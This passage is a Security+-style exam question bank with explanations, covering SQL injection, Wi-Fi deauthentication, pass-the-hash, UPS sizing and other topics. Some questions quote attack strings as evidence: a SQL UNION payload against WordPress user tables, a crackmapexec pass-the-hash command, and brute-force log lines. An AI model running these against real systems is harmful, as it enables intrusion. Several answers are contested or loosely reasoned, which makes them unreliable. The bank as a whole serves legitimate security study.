d. SQLi

A

d. SQL Injection (SQLi) vulnerability.

Here’s why:

SQL Injection (SQLi): SQL Injection involves inserting malicious SQL code into input fields (in this case, the userid parameter in the URL) that are directly used in SQL queries executed by the application's backend database. The attacker aims to manipulate the SQL query to extract sensitive information from the database. In the log entry:
    userid=1 UNION ALL SELECT user_login, user,_pass, user_email from wp_users: This part of the URL is attempting to perform a SQL UNION query to retrieve user login names (user_login), passwords (user,_pass), and email addresses (user_email) from the wp_users table in the WordPress database (wp_users).

Let’s briefly cover why the other options are not correct:

a. SSRF (Server-Side Request Forgery): SSRF involves tricking the server into making requests on behalf of the attacker to internal or external systems that the server has access to. The provided log does not indicate any SSRF attempt.

b. CSRF (Cross-Site Request Forgery): CSRF involves tricking a user into executing actions in an application without their knowledge or consent. It typically involves forging requests from the user's browser context, not directly through server logs as shown.

c. XSS (Cross-Site Scripting): XSS involves injecting malicious scripts into web pages viewed by other users. It does not involve manipulating SQL queries to extract data from databases as shown in the log.

Therefore, the correct answer is d. SQLi, as the attacker is attempting to exploit a SQL Injection vulnerability by manipulating the SQL query through the userid parameter in the URL to extract sensitive information from the database.

417
Q

A user is having network connectivity issues when working from a coffee shop. The user has used the coffee shop as a workspace for several months without any issues. None of the other customers at the coffee shop are experiencing these issues. A help desk analyst at the user’s company reviews the following Wi-Fi log:

Time Network Status Frequency
08:13:40 Coffee_Wi-Fi Network connected 5 GHz
08:13:45 Coffee_Wi-Fi Network disconnected 5 GHz
09:04:10 Coffee_Wi-Fi Network connected 5 GHz
09:04:15 Coffee_Wi-Fi Network disconnected 5 GHz
11:15:07 Coffee_Wi-Fi Network connected 2.4 GHz
11:15:12 Coffee_Wi-Fi Network disconnected 2.4 GHz

Which of the following best describes what is causing this issue?

a. Another customer has configured a rogue access point.
b. The coffee shop network is using multiple frequencies.
c. A denial-of-service attack by disassociation is occurring.
d. An evil twin access point is being utilized.

A

(Community : C 83%)

c. A denial-of-service attack by disassociation is occurring.

Here’s why:

The Wi-Fi log shows that the user’s device repeatedly connects to the network and then disconnects almost immediately. This pattern is indicative of a disassociation attack, a type of denial-of-service attack where an attacker sends disassociation frames to the victim’s device, causing it to disconnect from the network repeatedly.

Let’s briefly discuss why the other options are less likely:

a. Another customer has configured a rogue access point: While a rogue access point can cause connectivity issues, it would typically result in the user connecting to the wrong network rather than frequent disconnections after connecting to the correct network.

b. The coffee shop network is using multiple frequencies: The log shows connections on both 5 GHz and 2.4 GHz frequencies, but the disconnection issue is not due to the use of multiple frequencies. If it were simply a frequency issue, we would not expect the immediate disconnections after connecting.

d. An evil twin access point is being utilized: An evil twin attack involves setting up a malicious access point that mimics the legitimate one to intercept data. This could cause connection issues, but it typically results in connections to the fake access point rather than frequent disconnections.

Therefore, the log entries showing immediate disconnections after successful connections are most consistent with a denial-of-service attack by disassociation, where an attacker is deliberately causing the user’s device to disconnect from the network.

418
Q

Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

a. A biometric scanner
b. A smart card reader
c. A PKI token
d. A PIN pad

A

a. A biometric scanner

Here’s why:

Biometric Scanner: A biometric scanner uses unique physical characteristics of an individual, such as fingerprints, facial recognition, iris scans, or voice recognition, to verify their identity. This ensures that the person attempting to gain access is physically present and is the authorized individual, as these biometric traits are difficult to replicate or share.

Let’s briefly cover why the other options are less effective in ensuring the physical presence of the authorized user:

Smart Card Reader: A smart card reader authenticates access based on a smart card that the user possesses. While it confirms the presence of the card, it does not verify that the person holding the card is the authorized user, as smart cards can be lost, stolen, or shared.

PKI Token: A Public Key Infrastructure (PKI) token provides authentication through cryptographic keys. Similar to smart cards, it ensures the presence of the token but does not verify the identity of the person holding the token.

PIN Pad: A PIN pad requires the user to enter a Personal Identification Number (PIN) to gain access. While it authenticates based on knowledge of the PIN, it does not confirm the physical presence of the authorized user, as PINs can be shared or guessed.

Therefore, a. Biometric scanner is the best option for ensuring that only the authorized user is present when gaining access to a secured area, as it relies on unique, non-transferable physical characteristics.

419
Q

During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:

crackmapexec smb 192.168.10.232 -u localadmin -H 0A3CE8D07A46E5C51070F03593E0A5E6

Which of the following attacks occurred?

a. Buffer overflow
b. Pass the hash
c. SQL injection
d. Replay attack

A

b. Pass the hash

Here’s why:

Pass the Hash: The command crackmapexec smb 192.168.10.232 -u localadmin -H 0A3CE8D07A46E5C51070F03593E0A5E6 uses the crackmapexec tool to authenticate to an SMB (Server Message Block) service on the host 192.168.10.232 with the username localadmin and a hash (-H 0A3CE8D07A46E5C51070F03593E0A5E6). This indicates that the attacker is using the hash of the password rather than the password itself to authenticate. This technique is known as "Pass the Hash."

Let’s briefly cover why the other options are not applicable:

Buffer Overflow: A buffer overflow attack involves exploiting a program by overrunning a buffer’s boundary and overwriting adjacent memory. The given command does not show any indication of trying to overflow a buffer or manipulate memory boundaries.

SQL Injection: SQL injection involves injecting malicious SQL statements into an input field for execution by a database. The given command does not interact with a database or include any SQL code.

Replay Attack: A replay attack involves capturing and retransmitting valid data transmissions to repeat or delay a valid transaction. The given command does not indicate retransmitting data but instead shows an attempt to authenticate using a hash.

Therefore, b. Pass the hash is the correct answer, as the command shows the use of a hashed password to authenticate to a service.

420
Q

A company is moving to new location. The systems administrator has provided the following server room requirements to the facilities staff:

*Consistent power levels in case of brownouts or voltage spikes
*A minimum of 30 minutes runtime following a power outage
*Ability to trigger graceful shutdowns of critical systems

Which of the following would BEST meet the requirements?

a. Maintaining a standby, gas-powered generator
b. Using large surge suppressors on computer equipment
c. Configuring managed PDUs to monitor power levels
d. Deploying an appropriately sized, network-connected UPS device

A

d. Deploying an appropriately sized, network-connected UPS device

Here’s why:

Consistent power levels in case of brownouts or voltage spikes: A UPS (Uninterruptible Power Supply) device can provide consistent power by regulating voltage levels and protecting against brownouts and voltage spikes.

A minimum of 30 minutes runtime following a power outage: A properly sized UPS can provide battery backup power for a specified period, such as 30 minutes, allowing systems to remain operational during short outages.

Ability to trigger graceful shutdowns of critical systems: A network-connected UPS can communicate with servers and other critical systems to initiate a graceful shutdown process when the UPS battery reaches a certain threshold, ensuring data integrity and preventing damage.

Let’s briefly cover why the other options are not as suitable:

a. Maintaining a standby, gas-powered generator: While a generator can provide power during an extended outage, it typically takes some time to start up, which may not cover the initial 30 minutes following a power outage. Additionally, it does not address voltage regulation or provide the capability to trigger graceful shutdowns.

b. Using large surge suppressors on computer equipment: Surge suppressors can protect against voltage spikes but do not provide battery backup power during outages or brownouts. They also do not offer the ability to trigger graceful shutdowns.

c. Configuring managed PDUs to monitor power levels: Managed Power Distribution Units (PDUs) can monitor and manage power distribution but do not provide battery backup power or protection against voltage fluctuations. They also do not have the capability to trigger graceful shutdowns on their own.

Therefore, d. Deploying an appropriately sized, network-connected UPS device is the best solution to meet all the specified server room requirements.

421
Q

Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

a. IP schema
b. Application baseline configuration
c. Standard naming convention policy
d. Wireless LAN and network perimeter diagram

A

c. Standard naming convention policy

Here’s why:

Standard Naming Convention Policy: This policy defines the rules and guidelines for naming network devices and other IT resources within an organization. It ensures consistency and clarity in the naming of devices, making it easier to manage and identify them within the network. The policy typically includes conventions for device types, locations, functions, and other relevant attributes that should be reflected in the names assigned to new devices.

Let’s briefly cover why the other options are not suitable for providing guidelines on labeling new network devices:

IP Schema: An IP schema defines the structure and allocation of IP addresses within the network but does not provide guidelines on naming or labeling devices.

Application Baseline Configuration: This refers to the standard configuration settings for applications to ensure they operate correctly and securely but does not address the naming or labeling of network devices.

Wireless LAN and Network Perimeter Diagram: This diagram visually represents the layout and structure of the wireless LAN and network perimeter but does not provide naming conventions or labeling guidelines for new network devices.

Therefore, c. Standard naming convention policy is the correct answer as it directly addresses the need for guidelines on labeling new network devices as part of the initial configuration.

422
Q

A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is the most likely reason for this request?

a. The CSIRT thinks an insider threat is attacking the network.
b. Outages of business-critical systems cost too much money.
c. The CSIRT does not consider the systems engineer to be trustworthy.
d. Memory contents, including fileless malware, are lost when the power is turned off.

A

d. Memory contents, including fileless malware, are lost when the power is turned off.

Here’s why:

Memory contents, including fileless malware, are lost when the power is turned off: Disconnecting the network cable stops the data exfiltration without powering down the system. This preserves the volatile memory (RAM) contents, which might contain crucial evidence of the compromise, such as active processes, network connections, and potentially fileless malware. Fileless malware operates in memory and would be lost if the system were powered down, making it impossible to analyze the full extent of the compromise.

Let’s briefly cover why the other options are less likely:

a. The CSIRT thinks an insider threat is attacking the network: While this could be a concern, the primary goal in this situation is to preserve evidence and stop data exfiltration. Disconnecting the network cable addresses this immediate need without implying distrust of the systems engineer.

b. Outages of business-critical systems cost too much money: Although this is a valid concern, the request to disconnect the network cable and avoid further actions is more likely focused on preserving forensic evidence rather than avoiding outages.

c. The CSIRT does not consider the systems engineer to be trustworthy: This is less likely the reason for the specific instructions given. The request is standard procedure to ensure that evidence is preserved and the investigation can proceed effectively.

Therefore, the correct answer is d. Memory contents, including fileless malware, are lost when the power is turned off, as this best explains the CSIRT’s request to disconnect the network cable while avoiding any actions that could lead to the loss of volatile memory data.

423
Q

Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company’s main gate?

a. Crossover error rate
b. False match rate
c. False rejection
d. False positive

A

c. False rejection

Here’s why:

False Rejection (False Negative): This occurs when a legitimate user is incorrectly denied access by the biometric system. In this case, the employee has been properly onboarded and should have access, but the fingerprint reader is denying entry, which is a classic example of a false rejection.

Let’s briefly cover why the other options are not suitable:

Crossover Error Rate (CER): This is a metric used to evaluate the performance of a biometric system, representing the point at which the false acceptance rate (FAR) and false rejection rate (FRR) are equal. It does not specifically describe the situation of an individual being incorrectly denied access.

False Match Rate (False Acceptance Rate, FAR): This occurs when the biometric system incorrectly grants access to an unauthorized person. It does not describe the situation where a legitimate user is denied access.

False Positive: This is similar to a false match rate and occurs when the system incorrectly identifies an unauthorized user as authorized. It does not apply to the situation where an authorized user is denied access.

Therefore, the correct answer is c. False rejection, as it accurately describes the scenario where a legitimate, onboarded employee is denied access by the fingerprint reader.

424
Q

Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?

a. Weak configurations
b. Integration activities
c. Unsecure user accounts
d. Outsourced code development

A

(Community : D 61%, A 31%)

d. Outsourced code development

Here’s why:

Outsourced code development: When UI development or any part of a highly sensitive project is outsourced, there is a potential risk related to the security and integrity of the code. Outsourced developers may not adhere to the same security standards as internal teams, and there is a risk of introducing vulnerabilities, intentional or unintentional, into the codebase. Moreover, the confidentiality and control over sensitive information could be compromised when handled by third parties.

Let’s briefly discuss why the other options are less critical in this specific context:

Weak configurations: While weak configurations are a significant security concern, they are typically managed through proper configuration management and security policies. They are not inherently tied to UI developer agreements but rather to how the system is set up and maintained.

Integration activities: Integration activities are crucial for ensuring that different parts of a system work together seamlessly. However, the primary concern in the context of UI developer agreements and highly sensitive projects is the security of the code itself and the practices of the developers.

Unsecure user accounts: This concern relates to how user accounts are managed and protected, which is crucial for operational security. However, it is more about the implementation and maintenance of security practices rather than the development process and agreements.

Therefore, d. Outsourced code development is the most relevant concern for customers considering the use of these products on highly sensitive projects, as it directly affects the security and integrity of the development process and the final product.

(Braindump: a. Weak configurations)

425
Q

Which of the following identifies the point in time when an organization will recover data in the event of an outage?

a. ALE
b. RPO
c. MTBF
d. ARO

A

b. RPO (Recovery Point Objective)

Here’s why:

Recovery Point Objective (RPO): RPO is the maximum acceptable amount of data loss measured in time. It defines the point in time to which data must be recovered after an outage. For example, if the RPO is 4 hours, the organization needs to ensure that it can recover data from backups that are no older than 4 hours.

Let’s briefly cover what the other options mean and why they are not relevant to identifying the point in time for data recovery:

ALE (Annualized Loss Expectancy): ALE is a risk management metric that represents the expected monetary loss for an asset due to a risk over a year. It is calculated by multiplying the Single Loss Expectancy (SLE) by the Annualized Rate of Occurrence (ARO).

MTBF (Mean Time Between Failures): MTBF is a reliability metric that indicates the average time between failures for a system or component. It is used to predict the time between failures during normal operation.

ARO (Annualized Rate of Occurrence): ARO represents the expected frequency with which a specific risk is likely to occur within a year. It is used in risk assessments to calculate the likelihood of an event happening annually.

Therefore, b. RPO is the correct answer as it specifically refers to the point in time when data must be recovered in the event of an outage.

426
Q

A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?

a. Hybrid
b. Private
c. Public
d. Community

A

d. Community

Here’s why:

Community Cloud: A community cloud is a cloud infrastructure that is shared by several organizations with common concerns, such as security, compliance, or mission objectives. In this case, the police department and city officials are part of the same community (e.g., local government agencies) and share common interests and requirements for security, privacy, and data sharing.

Let’s briefly explain why the other options are not suitable:

Hybrid Cloud: A hybrid cloud is a combination of two or more cloud types (private, public, or community) that remain distinct entities but are bound together by standardized technology that enables data and application portability. This scenario specifically describes a shared environment rather than a hybrid setup.

Private Cloud: A private cloud is dedicated to a single organization, offering greater control and security. However, this scenario involves multiple organizations (police department and city officials), making the private cloud model less appropriate.

Public Cloud: A public cloud is owned and operated by a third-party cloud service provider and made available to the general public. This model is not typically used for sensitive government data sharing due to security and privacy concerns.

Therefore, d. Community is the best answer as it accurately describes a shared cloud environment tailored for multiple government entities with common objectives and requirements.

427
Q

A user reports that a bank’s website no longer displays a padlock symbol. A security analyst views the user’s screen and notices the connection is using HTTP instead of HTTPS. Which of the following attacks is most likely occurring?

a. Memory leak
b. SSL stripping
c. API
d. Pass the hash

A

b. SSL stripping

Here’s why:

SSL Stripping: In SSL stripping attacks, an attacker intercepts HTTP traffic between the user and the website, downgrading HTTPS connections to unencrypted HTTP connections. This makes it appear to the user that they are using a secure connection (HTTPS), but in reality, the connection is insecure (HTTP). As a result, the padlock symbol indicating a secure connection (HTTPS) does not appear in the browser.

Let’s briefly cover why the other options are less likely:

Memory leak: A memory leak occurs when a program allocates memory but fails to release it after use, leading to gradual depletion of available memory. It does not affect the display of the padlock symbol in the browser.

API: An API (Application Programming Interface) facilitates communication between software components. It does not directly relate to the display of the padlock symbol or the security of a website connection.

Pass the hash: Pass the hash is a technique used to authenticate to a remote system using the hash of the user's password instead of the plaintext password. It is not directly related to the display of the padlock symbol on a website.

Therefore, b. SSL stripping is the correct answer as it aligns with the behavior where the user sees HTTP instead of HTTPS, indicating that the connection has been downgraded from a secure (HTTPS) to an insecure (HTTP) state by an attacker intercepting the traffic.

428
Q

A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability. Which of the following would be the most cost-effective solution for the data center to implement?

a. Uninterruptible power supplies with battery backup
b. Managed power distribution units to track these events
c. A generator to ensure consistent, normalized power delivery
d. Dual power supplies to distribute the load more evenly

A

a. Uninterruptible power supplies (UPS) with battery backup

Reasoning:

Immediate Power Stabilization: A UPS with battery backup can immediately provide stable power to critical systems during under-voltage events, ensuring continuous operation and preventing system downtime.

Cost-Effectiveness: Compared to generators and dual power supplies, UPS systems are generally more cost-effective for handling short-term power fluctuations. Generators are more suited for longer-term outages and can be significantly more expensive.

Scalability: UPS systems can be scaled to match the needs of the data center, providing flexibility as the data center grows.

Ease of Implementation: Installing UPS units can be straightforward and quickly implemented compared to the complexities and time involved in setting up generators or reconfiguring power supplies.

Generators and dual power supplies might be necessary for more severe power issues or long-term solutions, but for addressing frequent under-voltage events cost-effectively, a UPS with battery backup is the best option.

429
Q

A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

a. Soft token
b. Smart card
c. CSR
d. SSH key

A

d. SSH key

Here’s why:

SSH Key: SSH keys provide a secure and passwordless authentication method for accessing Linux servers remotely. They eliminate the need for managing passwords and additional software installation, which aligns with the business partner's requirement to avoid these complexities. SSH keys use public-key cryptography, where the private key resides on the client side (business partner's computer) and the corresponding public key is added to the authorized_keys file on the Linux server for authentication.

Let’s briefly discuss why the other options are less suitable:

Soft Token: Soft tokens are typically used for two-factor authentication (2FA) and often require additional software installation and management. They also do not eliminate the need for passwords entirely.

Smart Card: Smart cards also provide secure authentication, but they require physical cards and card readers, which may not align with the business partner's desire to avoid additional hardware and software management.

CSR (Certificate Signing Request): A CSR is used in the context of obtaining an SSL/TLS certificate and is not directly related to authentication for accessing a Linux server remotely.

Therefore, d. SSH key is the most appropriate recommendation as it meets the business partner’s requirement for passwordless authentication and avoids the need for additional software installation.

430
Q

A security analyst is assisting a team of developers with best practices for coding. The security analyst would like to defend against the use of SQL injection attacks. Which of the following should the security analyst recommend first?

a. Tokenization
b. Input validation
c. Code signing
d. Secure cookies

A

b. Input validation

Here’s why:

Input Validation: Input validation is the process of ensuring that input data is clean, correct, and useful before it is used in the application. For SQL injection attacks, input validation involves validating and sanitizing user input to ensure that it does not contain malicious SQL commands. Proper input validation prevents attackers from injecting SQL code into input fields that could manipulate database queries.

Let’s briefly discuss why the other options are not as effective or relevant for defending against SQL injection attacks:

Tokenization: Tokenization is a technique used to protect sensitive data by replacing it with unique identification symbols (tokens). While tokenization is important for protecting data at rest or in transit, it does not directly address SQL injection vulnerabilities in code.

Code Signing: Code signing ensures that code has not been altered or corrupted since it was signed by the developer. It helps in verifying the authenticity and integrity of code but does not specifically defend against SQL injection attacks.

Secure Cookies: Secure cookies are used to enhance security by ensuring that cookies are only sent over HTTPS connections and are not accessible to JavaScript. While secure cookies are important for session management and preventing certain types of attacks, they do not directly mitigate SQL injection vulnerabilities.

Therefore, b. Input validation is the first and most fundamental recommendation the security analyst should make to defend against SQL injection attacks. It helps ensure that user input is safe and does not pose a risk of SQL injection when processed by the application.

431
Q

Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following cloud features is the most appropriate to ensure access is granted properly?

a. API integrations
b. Auditing
c. Resource policies
d. Virtual networks

A

c. Resource policies

Here’s why:

Resource Policies: Resource policies in cloud environments allow you to define fine-grained permissions and access controls for specific resources. These policies are typically defined using JSON or YAML syntax and can specify who can access the resource, from where, and under what conditions. They are essential for managing access at the resource level and ensuring that access is granted according to security requirements.

Let’s briefly discuss why the other options are less suitable in the context of ensuring proper access control:

API Integrations: API integrations are important for connecting different services and applications within a cloud environment but do not directly ensure access control at the resource level.

Auditing: Auditing is crucial for monitoring and logging access activities to identify security incidents and compliance issues. While auditing provides visibility into access events, it does not enforce access controls or permissions.

Virtual Networks: Virtual networks (VPCs in AWS, VNets in Azure) provide isolated network environments within a cloud provider's infrastructure. They are important for network segmentation and isolation but do not directly manage or enforce access controls at the resource level.

Therefore, c. Resource policies is the most appropriate cloud feature to ensure access is granted properly by allowing you to define and enforce specific access controls and permissions for individual resources within the cloud environment.

432
Q

A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

a. cat /var/messages | grep 10.1.1.1
b. grep 10.1.1.1 | cat /var/messages
c. grep /var/messages | cat 10.1.1.1
d. cat 10.1.1.1 | grep /var/messages

A

a. cat /var/messages | grep 10.1.1.1

Here’s why:

cat /var/messages: This command displays the contents of the /var/messages log file.
|: This symbol is the pipe operator, which redirects the output of one command (cat /var/messages) as input to another command (grep 10.1.1.1).
grep 10.1.1.1: This command filters the input (which is the content of /var/messages from the previous cat command) and searches for lines that contain the IP address 10.1.1.1.

Therefore, the command cat /var/messages | grep 10.1.1.1 effectively searches through the log file /var/messages for any events associated with the IP address 10.1.1.1 and displays those lines in the terminal.

433
Q

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

10.35.45.53 - - [22/May/2020:06:57:31 +0100] “GET /api/client_id=1 HTTP/1.1” 403 1705 “http://www.example.com/api/” “PostmanRuntime/7.26.5”
10.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /api/client_id=2 HTTP/1.1” 403 1705 “http://www.example.com/api/” “PostmanRuntime/7.26.5”
10.32.40.13 - - [22/May/2020:08:08:52 +0100] “GET /api/client_id=1 HTTP/1.1” 302 21703 “http://www.example.com/api/” “CompanyMobileApp/1.1.1”
10.32.40.25 - - [22/May/2020:08:13:52 +0100] “GET /api/client_id=1 HTTP/1.1” 200 21703 “http://www.example.com/api/” “CompanyMobileApp/2.3.1”
10.35.45.53 - - [22/May/2020:08:20:18 +0100] “GET /api/client_id=2 HTTP/1.1” 200 22405 “http://www.example.com/api/” “CompanyMobileApp/2.3.0”

Which of the following is the most likely cause of the security control bypass?

a. IP address allow list
b. User-agent spoofing
c. WAF bypass
d. Referrer manipulation

A

b. User-agent spoofing

Here’s the reasoning:

User-Agent Spoofing: The User-Agent field in HTTP headers identifies the client making the request (e.g., browser, application). In the logs:
    Requests from the Penetration Testing consultants (IP address 10.35.45.53) using Postman as the User-Agent resulted in a 403 Forbidden response, indicating access was denied.
    However, requests from the Company's Mobile App (User-Agent: "CompanyMobileApp") to the same API endpoint (/api/client_id=1) resulted in a 302 Found and subsequently a 200 OK response, indicating successful access and data retrieval.

This discrepancy suggests that the API was intended to be accessed only from the company’s mobile application (CompanyMobileApp), as indicated by the User-Agent field. The successful responses to requests with the correct User-Agent indicate that the API was configured to allow access based on this header.

Therefore, b. User-agent spoofing is the most likely cause of the security control bypass, where the penetration testing consultants were able to download sensitive data by spoofing the User-Agent header to match that of the legitimate company mobile application. This allowed them to bypass IP restrictions or other security controls that might have been in place.

434
Q

Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

a. Lessons learned
b. Identification
c. Simulation
d. Containment

A

a. Lessons learned

Here’s why:

Lessons Learned: This phase involves a comprehensive review and analysis of the incident response exercise, focusing on what worked well, what didn't, and areas for improvement. It includes gathering feedback from participants, documenting observations, and identifying actionable insights to enhance the incident response process in the future. By conducting a lessons learned session, organizations can refine their incident response procedures, update policies, improve coordination among teams, and address any gaps or weaknesses identified during the exercise.

Let’s briefly discuss why the other options are less suitable in this context:

Identification: While identification is a crucial step in incident response (specifically in understanding the nature and scope of an incident), it does not directly address the post-exercise review and improvement process.

Simulation: Simulation refers to the act of creating a realistic scenario to test incident response capabilities. While simulations are valuable for training and testing readiness, they are part of the exercise itself rather than the post-exercise improvement phase.

Containment: Containment is an immediate action taken during incident response to prevent further spread or damage caused by the incident. It focuses on stopping the incident from escalating rather than on post-exercise improvements.

Therefore, a. Lessons learned is the process that would most likely help an organization after conducting an incident response exercise to improve performance, refine procedures, and identify challenges for future incident response readiness.

435
Q

Which of the following control types is patch management classified under?

a. Deterrent
b. Physical
c. Corrective
d. Detective

A

c. Corrective

Here’s why:

Corrective Controls: These controls are designed to mitigate or remediate vulnerabilities or incidents that have been identified. Patch management falls under this category because it involves the process of identifying, acquiring, testing, and applying patches (software updates) to systems and applications to correct vulnerabilities and ensure they are up-to-date and secure.

Deterrent Controls: These controls are aimed at discouraging potential attackers and preventing incidents from occurring.

Physical Controls: These controls include physical security measures such as locks, fences, and security guards.

Detective Controls: These controls are focused on detecting incidents or anomalies that have already occurred or are ongoing.

Therefore, c. Corrective is the correct classification for patch management, as it addresses the correction of vulnerabilities through timely application of patches to software and systems.

436
Q

A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the flowing entries:

106.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /login?username=admin&pin=0000 HTTP/1.1” 200 11705 “http://www.example.com/login.php”
106.35.45.53 - - [22/May/2020:07:01:21 +0100] “GET /login?username=admin&pin=0001 HTTP/1.1” 200 11705 “http://www.example.com/login.php”
106.35.45.53 - - [22/May/2020:07:01:52 +0100] “GET /login?username=admin&pin=0002 HTTP/1.1” 200 11705 “http://www.example.com/login.php”
106.35.45.53 - - [22/May/2020:07:02:18 +0100] “GET /login?username=admin&pin=0003 HTTP/1.1” 200 11705 “http://www.example.com/login.php”
106.35.45.53 - - [22/May/2020:07:02:18 +0100] “GET /login?username=admin&pin=0004 HTTP/1.1” 200 11705 “http://www.example.com/login.php”

Which of the following password attacks is taking place?

a. Dictionary
b. Brute-force
c. Rainbow table
d. Spraying

A

b. Brute-force

Here’s why:

Brute-force Attack: In a brute-force attack, an attacker systematically tries all possible combinations of passwords or PINs until the correct one is found. In this case, the attacker is attempting to log in as the admin user by sequentially trying different PINs (0000, 0001, 0002, etc.) through repeated GET requests to the /login endpoint with different PIN values.

Web Server Logs: The logs show multiple sequential requests with different PIN values (pin=0000, pin=0001, pin=0002, etc.) for the admin user. Each request results in a 200 OK response, indicating that the server is accepting these requests and responding with the login page.

Other Options:
    Dictionary Attack: In a dictionary attack, the attacker uses a predefined list of common passwords or phrases, which is not evident from the logs as each PIN is sequentially attempted.
    Rainbow Table Attack: Rainbow tables are precomputed tables used for reversing cryptographic hash functions to crack passwords, which is not indicated by the direct sequential attempts in the logs.
    Spraying Attack: Password spraying involves trying a small number of commonly used passwords against many accounts, rather than trying many passwords against a single account.

Therefore, based on the evidence provided in the logs, the attack is best described as a brute-force attack, where the attacker is systematically attempting different PINs to gain unauthorized access to the admin account of the web application.

437
Q

A company that provides an online streaming service made its customers’ personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?

a. Regulatory fines
b. Reputation damage
c. Increased insurance costs
d. Financial loss

A

b. Reputation damage

Here’s why:

Reputation Damage: Exposing customers' personal data can severely damage the company's reputation. Customers may lose trust in the company's ability to protect their sensitive information, leading to negative publicity, social media backlash, and a decline in customer confidence. This can impact customer retention and future customer acquisition efforts.

While regulatory fines could also potentially apply depending on data protection laws violated and jurisdiction, and there might be some financial loss due to legal costs or compensation, reputation damage is typically the most immediate and significant consequence in such scenarios. It directly affects customer perception and trust in the company’s brand.

Therefore, b. Reputation damage is the best description of the consequence resulting from the data disclosure incident described.

438
Q

An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sale systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Choose two.)

a. Load balancing
b. Incremental backups
c. UPS
d. RAID
e. Dual power supply
f. VLAN

A

a. Load balancing: Load balancing distributes incoming network traffic across multiple servers. This helps optimize resource utilization, maximize throughput, minimize response time, and ensure that no single server is overwhelmed. It improves fault tolerance by redirecting traffic away from servers that may be experiencing issues or high loads, thereby maintaining availability.

d. RAID (Redundant Array of Independent Disks): RAID is a data storage virtualization technology that combines multiple physical disk drive components into one or more logical units for the purposes of data redundancy, performance improvement, or both. RAID levels like RAID 1 (mirroring) or RAID 5 (striping with parity) provide fault tolerance against disk failures, ensuring data availability even if one or more disks fail.

Here’s why the other options are less suitable in this context:

Incremental backups: While backups are important for data recovery, they do not directly address fault tolerance or availability during peak loads.

UPS (Uninterruptible Power Supply) and Dual power supply: These address power availability and stability, which are important but do not directly improve fault tolerance or availability of point-of-sale systems under high consumer load.

VLAN (Virtual Local Area Network): VLANs are used to logically segment a network, improving security and management, but they do not directly improve fault tolerance or availability of servers during peak loads.

Therefore, a. Load balancing and d. RAID are the best options to accomplish the objective of improving server-data fault tolerance and site availability under high consumer load for the organization.

439
Q

Which of the following can be used to detect a hacker who is stealing company data over port 80?

a. Web application scan
b. Threat intelligence
c. Log aggregation
d. Packet capture

A

d. Packet capture

Packet capture (option d) involves capturing and analyzing network traffic, which can help detect unauthorized activities such as data theft over port 80. Port 80 is commonly used for HTTP traffic, and by capturing packets, one can inspect the data being transmitted to identify suspicious patterns or anomalies indicative of a hacker stealing company data.

440
Q

A company recently enhanced mobile device configuration by implementing a set of security controls biometrics context-aware authentication and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data. Which of the following additional controls should be put in place first?

a. GPS tagging
b. Remote wipe
c. Screen lock timer
d. SEAndroid

A

c. Screen lock timer

Reasoning:

Immediate Protection: A screen lock timer will ensure that the phone automatically locks itself after a short period of inactivity, reducing the window of opportunity for an unauthorized person to access the device.

Complement Existing Controls: While biometrics, context-aware authentication, and full device encryption are excellent security measures, they rely on the device being locked to be effective. A screen lock timer ensures these controls are in play by locking the device when it's not in use.

User-Friendly: This control can be implemented without significant inconvenience to users, making it a practical first step in enhancing security.

Prevents Unauthorized Access: By locking the screen quickly when the phone is not actively used, it reduces the risk of someone picking up an unattended phone and gaining immediate access to corporate data.

While options like remote wipe (b) and GPS tagging (a) are useful for other security scenarios, they are more reactive measures rather than preventive. SEAndroid (d) provides a secure environment but won’t prevent access if the device is already unlocked. Therefore, implementing a screen lock timer is the most effective immediate step.

441
Q

An organization wants to quickly assess how effectively the IT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

a. Install a SIEM tool and properly configure it to read the OS configuration files
b. Load current baselines into the existing vulnerability scanner
c. Maintain a risk register with each security control marked as compliant or non-compliant
d. Manually review the secure configuration guide checklists

A

b. Load current baselines into the existing vulnerability scanner

Loading current baselines into the existing vulnerability scanner (option b) is the best solution for quickly assessing how effectively the IT team has hardened new laptops. Here’s why:

Automated Assessment: Vulnerability scanners can quickly and automatically check the configuration of the laptops against the loaded baselines, providing a comprehensive and efficient assessment.
Consistency: Using a baseline ensures that all laptops are evaluated against the same standards, providing consistent results.
Speed: Automated scans are much faster than manual reviews, allowing for rapid assessment and identification of any deviations from the desired security posture.

Now, let’s examine the potential shortcomings of the other options:

a. Install a SIEM tool and properly configure it to read the OS configuration files:

Explanation: SIEM (Security Information and Event Management) tools aggregate and analyze security data from various sources to detect and respond to threats.
Potential Shortcomings: While SIEM tools are powerful for monitoring and detecting security incidents, they are not specifically designed for assessing hardening configurations. Properly configuring a SIEM tool to read OS configuration files can be complex and time-consuming, making it less suitable for a quick assessment.

c. Maintain a risk register with each security control marked as compliant or non-compliant:

